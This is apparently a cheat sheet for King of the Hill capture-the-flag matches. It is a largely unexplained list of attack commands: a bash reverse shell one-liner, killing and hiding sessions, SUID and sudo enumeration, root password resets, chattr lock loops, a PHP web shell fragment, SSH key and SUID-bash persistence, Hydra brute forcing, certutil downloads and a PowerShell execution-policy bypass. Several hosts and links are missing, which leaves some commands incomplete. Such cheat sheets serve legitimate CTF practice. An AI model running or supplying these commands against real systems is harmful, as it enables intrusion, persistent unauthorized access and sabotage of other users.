Description: In the King of the Hill (KoTH) Attack-Defence challenge, your goal is to compromise the target machine and gain access to the coveted /root/king.txt file on Linux machines or C:\king.txt (or C:\Users\Administrator\king-server\king.txt) on Windows machines. Once you've successfully breached the system, your task is to maintain access and defend the king file from other players.
- you can check who is on the machine, by using the following command.
ps aux | grep pts
- If you're looking for your pts id/number:
- killing session of other players:
pkill -9 -t pts/$0 # Here $0 = pts/id number
If your opponent killing your session, again and again. you can use this command to hide your shell (pts id) on the machine
To get the PID of your PTS.
ps aux
- Hide your PTS
mount -o bind /tmp /proc/your-PID-here
if you use this command then your opponent will not be able to kill your session Anymore ;)
- Use this website to generate Reverse shell command (bash,python,PHP,socat)β οΈ
- Reverse Shell generator + other Useful commands for basic penetration testingπ οΈ
- Easy to Remember Reverse shell π oneliner
bash -c "bash -i >& /dev/tcp/ 0>&1"
- Use this github repo to get code of php-reverse-shell.php π
- GTFoBins is a curated list of Unix binaries that can be used to escalate Privilege:
- If you're looking for Binaries that has root permissions:
1) find / -perm -u=s -type f 2>/dev/null
2) find / -type f \( -perm -4000 -o -perm -2000 \) -print
3) find / -perm /4000 2>/dev/null
4) find / -type f -user root -perm -u=s 2>/dev/null
- If you're looking for Binaries that has Sudo permissions:
sudo -l
- If you're looking for Flags:
1) find / -type f -name "user.txt" 2>/dev/null
2) find / -name root.txt 2>/dev/null
3) find / -name .flag 2>/dev/null
- Change the password for the root user and other existing users using one-liners:
1) echo -e "YOURpassword\nYOURpassword" | passwd root
2) echo -e "YOURpassword\nYOURpassword" | passwd user
- protect king.txt using chattr.
chattr +i king.txt
chattr -i king.txt
- Use chattr loops to protect lock your name in king.txt
while [ 1 ]; do chattr -ia /root/king.txt 2>/dev/null; echo -n "YourNick" >| /root/king.txt 2>/dev/null; chattr +ia /root/king.txt 2>/dev/null; done &
- Use Chattr for lock /root folder:
cd / && chattr +i root
It is forbidden to change the permission of binaries in Koth Match, for example give a chmod 700 /usr/bin/find, except chattr, the chattr binary is allowed to remove from the machine.( remove from the machine after you use: [Activate] chattr +i king.txt ).
- Remove chattr so no one will be able to change the attributes of king.txt
rm /usr/bin/chattr
- but if you have access to a koth box and you don't have chattr you can get a chattr binary from github and compile it on the machine:
gcc chattr.c -o chattr
./chattr +i king.txt
if you try to put your nick in /root/king.txt and the message "Read-only file system" appears, that means the other player is used Mount technique.
- Unmount king.txt using umount:
umount -l /root
umount -l /root/king.txt
Get Shell by exploiting file upload Vulnerability
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
echo "</pre>";
Shell Persistence using SSH - Attacker Terminal & Target Terminal
Step 1: Navigate to the SSH directory on your Target Terminal -
cd /root/.ssh
Step 1.2 :- Return to your attacker Terminal and execute:
cd /root/.ssh
Step 2: Return to your attacker terminal and execute:
ssh-keygen -t rsa
[Attacker Terminal] Step 3: Display the content of using cat and copy its content using:
cat """ <Content> """ > authorized_keys
[Attacker Terminal] Step 4: Set the permissions for id_rsa -
chmod 600 id_rsa
Attacker Terminal Step 4.1: Send authorized_keys to the target system.:)
[Target Terminal] Step 5: Set permissions for authorized_keys -
chmod 700 /root/.ssh
chmod 600 /root/.ssh/authorized_keys
[Attacker Terminal] Step 6: Connect to the target system using the generated key -
ssh -i id_rsa root@
To avoid the need to re-exploit the host, we stored a copy of the root users id_rsa ssh key on our local machine as key.rsa
Display the content of id_rsa using cat command and copy its content in key.rsa:
cat id_rsa >> key.rsa
To reconnect with the key we executed
ssh -i key.rsa root@
Python3 Server (Attacker Machine)
python3 -m http.server 8080
Get install stuff in linux target
Get install stuff in Windows target
certutil.exe -urlcache -f
Run this command on your root shell to give permissions:
sudo chmod +s /bin/bash
Now, whenever you access this system again, run this command:
/bin/bash -p
Use Hydra to Brute-Force Login page
hydra -l admin -P passlist.txt http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
Use Hydra to Brute-Force SSH service
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh
- MSF-Persistence-Backdoor:
- Metasploit Unleashed: More Hacking Tricks and commands ποΈβ€
powershell.exe -NoProfile -ExecutionPolicy Bypass -File malicious.ps1
The command shows that PowerShell was used to execute a script named malicious.ps1 with potentially harmful intentions. Here's a breakdown:
- powershell.exe: Launches the PowerShell environment.
- -NoProfile: Runs PowerShell without loading user profiles to avoid detection or restrictions.
- -ExecutionPolicy Bypass: Bypasses any execution policy to allow running scripts, even if restricted.
- -File malicious.ps1: Executes the specified script, which is likely malicious.
This is a common technique used in attacks like fileless malware or script-based exploits.